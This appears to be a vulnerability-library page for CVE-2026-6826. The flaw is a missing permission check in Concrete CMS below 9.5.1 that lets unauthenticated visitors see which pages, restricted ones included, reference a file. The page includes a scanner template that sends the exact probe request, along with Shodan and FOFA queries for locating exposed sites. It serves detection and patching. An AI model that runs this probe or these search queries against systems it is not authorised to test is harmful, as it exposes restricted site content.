/Vulnerability Library

Concrete CMS <9.5.1 - Unauthenticated File Usage Disclosure

CVE-2026-6826
Verified

Description

Concrete CMS 9.5.0 and below is vulnerable to unauthenticated file usage disclosure via missing permission check in the usage controller.

Severity

Medium

CVSS Score

6.9

Exploit Probability

1%

Published Date

August 8, 2026

Template Author

str4k3r

CVE-2026-6826.yaml
id: CVE-2026-6826

info:
  name: Concrete CMS <9.5.1 - Unauthenticated File Usage Disclosure
  author: str4k3r
  severity: medium
  description: |
    Concrete CMS 9.5.0 and below  is vulnerable to unauthenticated file usage disclosure via missing permission check in the usage controller.
  impact: |
    Any unauthenticated visitor can request /ccm/system/dialogs/file/usage/{fID} with any file ID and receive a list of every page that references that file, including page IDs, handles, and full URLs. This includes pages that are otherwise restricted by permissions.
  remediation: |
    Update to the latest version beyond 9.5.0.
  reference:
    - https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
    - https://www.concretecms.org/security
    - https://nvd.nist.gov/vuln/detail/CVE-2026-6826
    - https://vulnerability.circl.lu/vuln/cve-2026-6826
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
    cvss-score: 6.9
    cve-id: CVE-2026-6826
    epss-score: 0.01461
    epss-percentile: 0.71592
    cwe-id: CWE-862
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.component:"Concrete CMS"
    fofa-query: app="Concrete-CMS"
  tags: cve,cve2026,concretecms,concrete,disclosure,unauth,idor

http:
  - method: GET
    path:
      - "{{BaseURL}}/ccm/system/dialogs/file/usage/1"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'ccm-ui'
          - 'Page ID'
          - 'Handle'
          - 'Location'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402202cbd7cece467132e7ee04f04d70273a2388f68418ce73c190ab1006e8c3d7b7502206a96c95773bdf25dfb8f9f916e2ef3b5583e8260623779ce1b347c5523380f11:922c64590222798bb761d5b6d8e72950
6.9Score

CVSS Metrics

CVSS Vector:
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
CVE ID:
cve-2026-6826
CWE ID:
cwe-862

References

https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-noteshttps://www.concretecms.org/securityhttps://nvd.nist.gov/vuln/detail/CVE-2026-6826https://vulnerability.circl.lu/vuln/cve-2026-6826

Remediation Steps

Update to the latest version beyond 9.5.0.